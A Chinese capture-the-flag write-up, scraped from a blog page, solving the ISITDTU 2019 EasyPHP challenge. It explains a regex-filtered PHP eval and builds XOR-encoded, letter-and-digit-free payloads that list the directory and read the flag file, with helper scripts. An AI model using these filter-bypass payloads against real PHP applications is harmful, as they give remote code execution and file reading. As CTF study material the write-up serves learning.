当前位置:网站首页>[ISITDTU 2019]EasyPHP
[ISITDTU 2019]EasyPHP
2022-06-11 16:08:00 【游戏编程】
最近都在摸鱼,每天不知道干啥,没法静下心来做题,今天做了这个题,最后对于题目理解模棱两可,所以写一写wp来加固一下知识点,把无字母数字rce的内容巩固一下,这道题目涉及的点比较小,想了解更多的绕过姿势还得阅读p神的文章。
打开靶机,看到源码:
<?phphighlight_file(__FILE__);$_ = @$_GET['_'];if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) die('rosé will not do it');if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd ) die('you are so close, omg');eval($_);?>源码意思是绕过两个if,最后eval执行命令
第一个正则匹配:
\x00- 0-9 匹配\x00到空格(\x20),数字0-9
'"`$&.,|[{_defgops\x7F 匹配'"`$&.,|[{_defgops这些字符和DEL(\x7F)字符 第二个正则匹配: count_chars() 函数返回字符串中所用字符的信息(返回一个字符串,包含所有在参数中使用过的不同字符(模式 3)) 也就是说,不一样的字符不能超过13个 先用下面脚本尝试一下满足正则的内置函数,查看后发现无可利用函数 <?php
$array=get_defined_functions();//返回所有内置定义函数
foreach($array['internal'] as $arr){
if ( preg_match('/[\x00- 0-9\'"\`$&.,|[{_defgops\x7F]+/i', $arr) ) continue;
if ( strlen(count_chars(strtolower($arr), 0x3)) > 0xd ) continue;
print($arr.'<br/>');
}
?> 这里尝试取反或者异或绕过,先试一下phpinfo() php -r "echo urlencode(~'phpinfo');" 从得到的信息看到大多数函数都被过滤,这里用print_r(scandir(.))来读取目录 (~%8F%8D%96%91%8B%A0%8D)((~%8C%9C%9E%91%9B%96%8D)(~%D1)); 发现不能绕过第二个匹配,为方便替换绕过,使用异或%ff形式结合替换绕过 print_r(scandir(.))为 ((%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF))); 做到这里已经没耐心了 直接看大佬的文章 [ISITDTU 2019]EasyPHP_fmyyy1的博客-CSDN博客 先本地测试一下长度 <?php
$_ = $_GET['_'];
echo strlen(count_chars($_,3)); 发现长度为16,需要设法减少3个 直接利用文章方法进行替换 str = 'acdips'
target = 'ntr'
for m in target:
for a in str:
for b in str:
for c in str:
if ord(a)^ord(b)^ord(c) == ord(m):
print("{} = {}^{}^{}".format(m,a,b,c)) n = c^d^i t = c^d^s r = a^c^p 利用print_r来说明:(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF)将对应的ntr替换变成: (%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF) 替换最后的payload为 ((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF))); 测试长度发现为13,符合要求。 payload为 ?_=((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF))); 发现flag在数组最后一个,用readfile(end(scandir(.)))来读取,构造方法同上 最后payload为: ?_=((%8D%9A%9E%9B%99%96%93%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%9A%9E%9B)^(%FF%99%FF)^(%FF%96%FF)^(%FF%FF%FF))(((%8D%9E%9E%9E%9B%96%8D)^(%9A%9B%FF%99%FF%FF%FF)^(%9B%99%FF%96%FF%FF%FF)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF))); $(function() { setTimeout(function () { var mathcodeList = document.querySelectorAll('.htmledit_views img.mathcode'); if (mathcodeList.length > 0) { var testImg = new Image(); testImg.onerror = function () { mathcodeList.forEach(function (item) { $(item).before('\(' + item.alt + '\)'); $(item).remove(); }) MathJax.Hub.Queue(["Typeset",MathJax.Hub]); } testImg.src = mathcodeList[0].src; } }, 1000) }) ahik1 关注
作者:ahik1
游戏编程,一个游戏开发收藏夹~
如果图片长时间未显示,请使用Chrome内核浏览器。
边栏推荐
- 什么是rs邮票纸?
- Nat Commun|语言模型可以学习复杂的分子分布
- Project workspace creation steps - Zezhong ar automated test tool
- 类的 prototype 属性和__proto__属性,类原型链有两条继承路线
- What is a generic? Why use generics? How do I use generics? What about packaging?
- Heartless sword English Chinese bilingual poem 001 Spring outing
- DHCP协议实例化分析
- Toolbar details of user interface - autorunner automated test tool
- How AGC security rules simplify user authorization and authentication requests
- C# 启动一个外部exe文件,并传入参数
猜你喜欢

The flat life of older farmers from Beijing to Holland

再聊数据中心网络
Detailed explanation of MySQL binlog log and master-slave replication

Data enhancement

How AGC security rules simplify user authorization and authentication requests

leetcode785. 判断二分图(中等)

Memory optimization table mot management

【剑指Offer】22.链表中倒数第K节点
![[sword finger offer] 22 The penultimate node in the linked list](/img/66/630ae9762f9d87817a14cb1c96015b.png)
[sword finger offer] 22 The penultimate node in the linked list

3000 words to teach you how to use mot
随机推荐
C starts an external EXE file and passes in parameters
Overview and operation of database dense equivalent query
What is a generic? Why use generics? How do I use generics? What about packaging?
High concurrency pseudo sharing and cache line filling (cache line alignment) (@contained)
laravel 8 通过 任务调度 实现 数据库备份
Basic SQL statement - delete / update
PostgreSQL startup process
How to optimize the performance of compose? Find the answer through "underlying principles" | developers say · dtalk
Import data: GS_ restore or MERGE INTO? See which one suits you better
PyQt5 使QPlainTextEdit控件支持行号显示
postgresql创建数据库
Opengauss database flashback function verification
大龄码农从北京到荷兰的躺平生活
leetcode-141. Circular linked list
真香,华为主动离职也给 N+1
laravel 8 使用passport 进行Auth验证及颁发token
Ai4db: AI slow SQL root cause analysis
Code farming essential SQL tuning (Part 2)
Detailed explanation of MySQL binlog log and master-slave replication
Laravel 8 realizes database backup through task scheduling